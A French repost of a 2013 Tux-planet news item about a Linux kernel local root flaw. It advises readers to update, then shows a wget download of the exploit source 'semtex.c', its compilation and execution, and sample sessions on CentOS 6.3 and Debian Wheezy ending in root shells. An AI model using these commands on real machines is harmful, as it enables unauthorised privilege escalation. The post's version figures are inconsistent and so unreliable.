Local Root Exploit pour les noyaux linux 2.6.37 à 3.8.10

May 15, 201313 yr

http://www.tux-planet.fr/wp-content/plugins/wp-tweet-button/tweetn.png

/public/images/icons/microbe.png
Une nouvelle faille 0day vient d'être découverte dans le noyau Linux et elle permet à un simple utilisateur de passer root sur une machine. Cette vulnérabilité affecte les distributions Linux basées sur des versions du kernel comprises entre la 2.6.37 et la à 3.8.8.

/public/images/photos/informatique/linux/tux/kernel-bug.jpg

Les versions récentes de Red Hat 6.3, Centos 6.3 (même avec SELinux d'activé) et Debian Wheezy 7.0Â sont concernées.Â Le seul moyen de contrer cette attaque est de mettre à jour votre système.

Voici un exemple d'utilisation de l'exploit :

$ wget www.tux-planet.fr/public/hack/exploits/kernel/semtex.c

$ gccÂ -O2 semtex.c

$Â ./a.out

Sur une CentOS 6.3 :

$ cat /etc/redhat-release

CentOS release 6.3 (Final)

$ uname -a

Linux test1.hq.company.com 2.6.32-279.el6.x86_64 #1 SMP Fri Jun 22 12:19:21 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux

$ id

uid=503(user) gid=503(user) groups=503(user)

context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

$ sestatus

SELinux status: enabled

SELinuxfs mount: /selinux

Current mode: enforcing

Mode from config file: enforcing

Policy version: 24

Policy from config file: targeted

$ ./a.out

2.6.37-3.x x86_64

[email protected] 2010

-sh-4.1# id

uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

Sur une Debian Wheezy 7.0 :

% cat /etc/debian_version

7.0

% uname -a

Linux ops-02 3.2.0-4-amd64 #1 SMP Debian 3.2.41-2 x86_64 GNU/Linux

% id

uid=1000(user) gid=1000(user) groups=1000(user), 24(cdrom), 25(floppy), 27(sudo), 29(audio), 30(dip), 44(video), 46(plugdev), 111(libvirt), 113(fuse), 114(lpadmin)

% ./a.out

2.6.37-3.x x86_64

[email protected] 2010

root@ops-02:~# id

uid=0(root) gid=0(root) groups=0(root), 24(cdrom), 25(floppy), 27(sudo), 29(audio), 30(dip), 44(video), 46(plugdev), 111(libvirt), 113(fuse), 114(lpadmin), 1000(user)

Des explications techniques sont lisibles ici et là.

Local Root Exploit pour les noyaux linux 2.6.37 à 3.8.10 est un article original provenant de Tux-planet

Voir l'article complet

Report

Sign In

Local Root Exploit pour les noyaux linux 2.6.37 à 3.8.10

Featured Replies

Account

Navigation

Search

Configure browser push notifications

Chrome (Android)

Chrome (Desktop)

Safari (iOS 16.4+)

Safari (macOS)

Edge (Android)

Edge (Desktop)

Firefox (Android)

Firefox (Desktop)